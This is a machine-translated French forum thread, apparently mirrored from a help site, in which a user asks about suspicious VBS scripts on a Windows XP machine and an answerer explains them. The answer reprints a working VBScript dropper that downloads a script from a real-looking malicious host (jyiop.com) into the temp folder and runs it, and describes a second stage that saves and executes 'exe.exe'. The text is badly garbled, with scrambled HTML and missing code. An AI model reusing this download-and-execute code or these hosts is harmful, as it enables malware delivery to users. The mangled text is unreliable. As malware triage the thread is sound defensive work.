Question : Pourrait un expert svp essayer d'interpréter ce code de VBS

Bonjour l'ami de l'experts

A avait vu un certain comportement peu commun avec son ordinateur de Windows Xp SP3 IE7 au-dessus des couples passés des jours dont je suis profondément soupçonneux.  J'ai observé qu'il se produisant au-dessus d'un raccordement de VNC juste qu'une fenêtre de la brève durée ago.

A CMD.EXE saute vers le haut et évidemment le dossier de waits.
A VBS s'ouvre dans le bloc - notes de Notepad.
When est fermé, la fenêtre closes.

I AM de CMD assez sure que c'est un manuscrit malveillant essayant de courir le dossier de VBS sans spécifier le programme (CScript ou WScript) pour le courir, et parce que j'ai placé l'action de défaut pour la plupart de type types de « manuscrit » de dossier au « édite » l'action (bloc - notes) plutôt que celui « ouvert » (exécuter le manuscrit), l'activité malveillante est probablement failing.

On la première occasion dont je n'étais pas témoin, le dossier « yb.vbs » a été ouvert dans le bloc - notes de la chemise de %TEMP% de l'utilisateur avec le contenu suivant : class= " lineNumbers " >
1 de >

B= " de 


I a sans risque téléchargé le nofollow " de » rel= de _blank " de » target= » de http://jyiop.com/kr/yb.vbs « de href= " de  le s de http://jyiop.com/kr/yb.vb » et a vu que le contenu était crûment « assombri » par renverser certains des paramètres comme montré ci-dessous : class= " lineNumbers " >
1 de >

w=3000 de l'id= " codeSnippet800242 " de >


I a sans risque téléchargé le nofollow référencé " de » rel= de _blank " de » target= » de http://jyiop.com/kr/hy/_q.php « de href= " de  le .php de http://jyiop.com/kr/hy/_q » pour indiquer ce code : class= " lineNumbers " >
1 de >

le class= >

I de 
 sauf la cible comme > sauf comme le dossier de *.htm du même nom) et avec le code approprié, de sorte que puisse juste être la réponse du serveur à ma tentative de télécharger le file.

Assuming le Relative URL égalise :  rel= " nofollow " de " _blank " de target= de " http://jyiop.com/kr/_yoyk.php " de href= de  http://jyiop.com/kr/_yoyk. le php
then qui résout au rel= " nofollow " de " _blank " de target= de " http://www.google.com " de href= de  http://www.google.com 
I AM examinant ceci sur mon propre système avec le rel= " nofollow " de " _blank " de target= de " http://www.google.co.uk " de href= de  http://www.google.co.uk  comme page d'accueil, ainsi moi savent qu'elle ne réoriente pas simplement à mon 

On de page d'accueil. l'occasion suivante dont j'étais témoin au-dessus de VNC qu'une commande a été évidemment publiée de courir le dossier « uor.vbs » de la chemise de %TEMP% de l'utilisateur dans une fenêtre de commande, et le cahier a sauté vers le haut contenant le manuscrit : class= " lineNumbers " >
1 de >

B= " de 
 le bs de http://ypuii.com/k_/uor.v » dans un éditeur de texte a indiqué les mêmes qu'avant, IE. strings.

Now, j'ai constaté que « GetSpecialFolder (2) » se rapporte à la chemise de %TEMP% de l'utilisateur, et je peux voir que le manuscrit télécharge le dossier de VBS, créant un VBScript en marche en enchaînant des cordes et les cordes renversées, mais je suis incertain d'exactement ce qu'un manuscrit comme ceci est faisant ou essayant à do.

I AM pas très familier avec VBS autres qu'une certaine utilisation de base, ainsi les références suivantes sont un puzzle à moi : 

maertS.BDODA = ADOBD.Stream

c.open OT, a, z : 
If de c.send () c.Status = x Then
u=c.ResponseBody : d.Open : d.Type = y : d.Write u : d.SaveToFile b : d.Close

I peut voir aussi tout simplement que le jour que Windows Media Player est tué au loin s'il fonctionne (qui il n'était pas aux temps matériels), mais je me demande pourquoi un manuscrit ferait l'autre issue apparent significative de this.

One est que j'ai découvert « un URL récemment dactylographié » dans la liste drop-down de barre d'adresse de l'IE de l'utilisateur : le rel= " nofollow " de » _blank » de target= de " http://ypuii.com/k_/zcus/efmjcg.pdf » de href= du 
 le fmjcg.pdf
I de http://ypuii.com/k_/zcus/e ne pourrait pas constater que le dossier caché n'importe où sur l'ordinateur et elle de l'utilisateur ne peut pas même rappeler quand elle aurait dernier a ouvert un dossier de pdf en son navigateur.  J'ai sauvé ce dossier de pdf et, sur l'inspection dans un éditeur de texte, je peux voir un certain contenu des textes en tant que certain genre de code préétabli et de référence au « Javascript ».  Ce qui suit est également clair dans un éditeur de texte : 

/Author (yZ=ssA f V)
/gZ de MllZTgg (. s_JUNCVZa #8l=z 96yp2x de b LPD tv/-Xqrf4dY3M : ihwBQn E K7gATGe H de S5Rm k o 0&uFOcj% ? 
/Title (qgMpr#AZMZH d'I1W) de NG JGgG ?)
/ModDate (D du 
/Creator (Kotefekjoesito) du 
/Keywords (Mokomeuapaualimajsi) : 20100621095906) le 

Googling du 
/Producer (820d5Deawohigejoxamogoga) juste le « créateur Kotefekjoesito » » nommé « me porte à cette page : rel= " nofollow " de » _blank » de target= de " http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753 » de href= du 
 ec/go de http://jsunpack.jeek.org/d ? le report=c4cc162b45e937762035f286406a989f2adf2753
where il prouve clairement que le dossier est Malicious.

I peut seulement deviner que la référence plus tôt dans le VBScript à « ADOBD.Stream » est une référence à « Adobe », et à un jet dans un dossier avec malveillance ouvré de pdf.  Je peux seulement supposer que c'était ou le début de l'issue, ou qu'il était un dossier a cherché par un manuscrit malveillant, mais je n'aurais pas pensé qu'il aurait ajouté l'URL à la liste récemment dactylographiée d'URL.  Cela déconcerte en soi. le 

Probably pas qu'une coïncidence est que le StrReverse googling ()  me porte également à l'emplacement du  de http://jsunpack.jeek.org  de nofollow " de » rel= de _blank " de » target= » de http://jsunpack.jeek.org « de href= " de  " avec cette page : rel= " nofollow " de » _blank » de target= de " http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e » de href= du 
 ec/go de http://jsunpack.jeek.org/d ? report=5d7727607489f01840f34855c5664e662488962e
but qu'il n'indique pas que qui est malicious.

Could quelqu'un veuillez me conseillent ce que ce premier manuscrit est susceptible d'avoir fait (ou d'avoir essayé pour faire) sur l'ordinateur de l'utilisateur.  Je voudrais savoir où je me tiens, parce qu'un plein balayage d'antivirus + de RootKit de système n'a donné aucun résultat positif et je ne peux voir aucune références aux dossiers de VBS dans le 

Bill
 de registry.

Thanks à l'avance

  
  class= de 











Réponse : Pourrait un expert svp essayer d'interpréter ce code de VBS










Voici je ne suis pas disposé à aller jusque ouvrir les sites Web que vous avez mentionnés cependant, des manuscrits ci-dessus ce que je vois…

Le manuscrit 1 crée un dossier blanc, des liens à un site Web et aux téléchargements le contenu de la page et des décharges il dans le dossier blanc.  Ce dossier est sauvé en tant que « yb.vbs » et est censé s'exécuter.
-------------------------------------------------------------------
B= " yb.vbs "
Avec CreateObject (« MSXML2.XMLHTTP »)
      .open « OBTIENNENT », « http://jyiop.com/kr/yb.vbs », faux
      .send ()
      Placer A = CreateObject (« Scripting.FileSystemObject »)
      Placer D = A.CreateTextFile (A.GetSpecialFolder (2) + « \ » + B)
      D.WriteLine .responseText
Extrémité avec
D.Close
CreateObject (« WScript.Shell »). Courir A.GetSpecialFolder (2) + » \ « + B
-------------------------------------------------------------------
Étape 2 maintenant que le dossier de vbs a été créé et course, il essaye de visiter une autre page Web mais cette fois sauve le contenu de page Web dans un dossier appelé le « exe.exe ».  Ce nouveau dossier doit être sauvé dans la chemise de temp d'utilisateurs.
Le manuscrit court alors le dossier « exe.exe ».
Comme vous avez mentionné, le taskkill arrête Windows Media Player - pourquoi, qui sait ? ! ? !
Le manuscrit supprime alors le manuscrit de vb qu'étape 1 a créé (le manuscrit qui fonctionne actuellement).
Il y a une seconde attente 3 alors que le dossier « exe.exe » est supprimé.

La présente partie ;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z : c.send ()
Si c.Status = puis x
u=c.ResponseBody : d.Open : d.Type = y : d.Write u : d.SaveToFile b : d.Close]
est le manuscrit dactylographiant pour ouvrir un dossier qui coulera dans la page Web - rien à faire avec Adobe.  « c.Status » - le manuscrit attend la page Web pour être prêt et adapté à télécharger. « u=c.ResponseBody » prend la page Web et la pousse dans une variable.  Le jet est ouvert et le texte est téléchargé dans la variable.  Le dossier est sauvé et fermé.  En ce manuscrit la page Web/dossier est sauvée dans la chemise de temp en tant que « exe.exe ».

Le vrai danger est que dossier de « exe.exe ».  Une fois qu'il a été couru, nul ne peut dire ce qu'il a été conçu pour faire.

Cet ordinateur est encore atteint d'un virus.  Le programme « exe.exe » pourrait avoir téléchargé d'autres virus à l'arrière-plan pour empêcher des balayages du système.  Le fait que vous pouvez voir la fenêtre de commande ouverte et le manuscrit est essayé pour fonctionner me dit qu'il y a un certain dossier malveillant s'attardant toujours.

Il peut être temps d'évaluer quels besoins d'être sauvé à partir de cette machine et commencer à nouveau par une réinstallation de Windows et des applications.  Il semble dramatique mais en voyant car l'antivirus ne détecte rien hors des sortes je penser que vous êtes au moment où aucun retour.  Se en rappeler cela tant que le code malveillant est allumé là, conduisent ; que ce soit le bâton de mémoire d'USB, l'appareil-photo etc., peut potentiellement contenir le virus/Trojan, s'il était fixé à la machine.
 
  

















Autres solutions
 























  •  MS Excel 2007 et pdf - l'exportation vers le pdf prend de longues heures !
    • 
    		

    

    
    		

    


    

    



  •  Dans le Perl, comment j'ajoute une valeur à la liste, puis le contrôle pour voir si la valeur existent avant d'ajouter une nouvelle valeur
    • 
    		

    

    
    		

    


    

    



  •  Comment fais j'initialiser de la HP BL460c G6 de san et de la HP XP 240000
    • 
    		

    

    
    		

    


    

    



  •  Comment fais j'employer une clef de permis de volume sur un ordinateur de HP avec du CD de restauration
    • 
    		

    

    
    		

    


    

    



  •  Emplacement primaire de deux SCCM dans l'annuaire actif
    • 
    		

    

    
    		

    


    

    



  •  L'initiateur et la HP D2D de l'iSCSI R2 du serveur 2008 de Windows GERCENT l'issue
    • 
    		

    

    
    		

    


    

    



  •  Stocker le dossier dans le mysql using connector.net et le champ de goutte
    • 
    		

    

    
    		

    


    

    



  •  Carte vidéo d'USB - bit 32 sur le matériel travaillant au niveau du bit 64 ?
    • 
    		

    

    
    		

    


    

    



  •  asp.net que j'essaye de convertir une forme de HTML en forme d'aspx ou ? ce qui jamais. Aide du besoin sur la façon dont à à elle.
    • 
    		

    

    
    		

    


    

    



  •  Winzip 12 issues de secours du travail ?
    • 
    		

    

    
    		

    

    

    		

    

    		

    

    

    

    

    


    		

    

    
 

    

    		

    

    		

    

    		

    

    
    		

    

    

    

    


    

    

    

    

    

    
programming4us

programming4us